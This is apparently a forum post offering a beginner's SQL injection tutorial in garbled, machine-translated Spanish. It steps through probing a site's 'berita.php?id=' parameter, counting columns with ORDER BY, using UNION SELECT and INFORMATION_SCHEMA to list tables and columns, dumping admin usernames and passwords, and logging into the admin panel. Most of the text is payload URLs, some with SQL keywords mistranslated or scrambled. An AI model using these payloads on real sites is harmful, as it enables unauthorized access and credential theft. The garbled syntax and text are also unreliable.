***************************************************************
* SQLI tutorial pour débutants ecrite par *..::Key-m0rt::..* *
****************************************************************
bueno aqui les traigo un pequeño tutorial de sqli para newbies ( principiantes ) espero que les guste no olvien agradecer , es gratis :P
===========
= Primer paso: =
===========
Buscar destino
Por ejemplo: [sitio] / berita.php? id = 100
Añadir los personajes al final de la URL, o agregar el carácter "-" (sin las ") para ver si hay un mensaje de error.
ejemplo:
[sitio] / berita.php? id = 100 'o
[sitio] / berita.php? id =- 100
==========
= El segundo paso: =
==========
encontrar y contar el número de tablas disponibles en la base de datos ...
use el comando: Ordenar por:
ejemplo:
CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + para + por +1- - o
[sitio] / berita.php? ID 100 =- + para + de 1 / *
paso a paso (satupersatu) ...
ejemplo:
CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + para + de +1- --
[sitio] / berita.php? ID 100 =- + para + por +2- --
[sitio] / berita.php? ID 100 =- + para + por +3- --
[sitio] / berita.php? ID 100 =- + para + por +4- --
por lo tanto, el error o mensaje de error de ...
Por ejemplo: [sitio] / berita.php? ID 100 =- + para + por +9- --
significa que tomamos es hasta el número 8
se convierte en [sitio] / berita.php? ID 100 =- + para + por +8- --
===========
= El tercer paso: =
===========
para averiguar cómo utilizar la Unión parece
debido a este error hasta el número 9
a continuación: [sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4,5,6,7,8 seleccione --
ok escribió los números es como el 5
utilizar la versión () o @ @ version para comprobar la versión de diapakai entrada de comandos SQL escribió sobre TSB nagka escribió el último en salir
Por ejemplo: [sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, version (), 6,7,8 - o
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, @ @ version, 6,7,8 --
Ver la versión utilizada es como YG 4 versiones dejan ver porque en este 4 que teníamos que adivinar su propia columna de la tabla n imaginable en la red porque no pueden usar el comando + De INFORMATION_SCHEMA ..
de la versión 5 significa que tienen la suerte de no tener que adivinar la columna de la tabla n Ver Ver como 4 porque el 5 era capaz de utilizar el comando de + INFORMATION_SCHEMA ..
===========
= cuarto paso : =
===========
para mostrar todo el contenido de la tabla que se está
GROUP_CONCAT comando (TABLE_NAME)>>> incluido en las cifras a la última respuesta
Comando + de + INFORMATION_SCHEMA.TABLES + + = donde table_schema base de datos ()>>> inserta a continuación del último número de
CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, GROUP_CONCAT (TABLE_NAME), 6,7,8 + de + en + + INFORMATION_SCHEMA.TABLES TABLE_SCHEMA = base de datos () -- --
=============
= quinto paso : =
=============
GROUP_CONCAT comando (column_name)>>> incluido en las cifras a la última respuesta
Comando + de + + + donde INFORMATION_SCHEMA.COLUMNS table_name = 0xhexa ->>> inserta a continuación del último número de
CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, GROUP_CONCAT (column_name), 6,7,8 + de + + + donde INFORMATION_SCHEMA.COLUMNS table_name = 0xhexa --
en esta etapa debe mengextrak palabra sobre el contenido de la tabla para convertir hexadecimal de esta manera
YG sitio web se utiliza para la conversión:
http://palembang.bforum.biz/ascii-h4.htm
ejemplo de palabras de compasión en la conversión de la administración se 61646D696E
CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, GROUP_CONCAT (column_name), 6,7,8 + de + + + donde INFORMATION_SCHEMA.COLUMNS table_name = 0x61646D696E --
============
= Sexto Paso : =
============
ayer dio lugar a lo que ha sido excluido de la tabla que es la forma
CONCAT_WS comando (0x3a, la columna de contenidos respuesta emitida)>>> incluido en las cifras a la última respuesta
Comando + de + (nombre derivado de la mesa)>>> inserta a continuación del último número de
CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + Seleccionar +1,2,3,4, CONCAT_WS (0x3a, el contenido de la columna), 6,7,8 + de + (nombre de la tabla derivados) --
ejemplos de palabras que salió fue el de identificación, nombre de usuario, contraseña
CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + Seleccionar +1,2,3,4, CONCAT_WS (0x3a, id, nombre de usuario, contraseña), 6,7,8 + de + admin --
==============
= Septimo paso : =
==============
etapa final para admin patio o inicio de sesión.
un saludo , agradezcan c'est gratuit *..:: key-m0rt::..*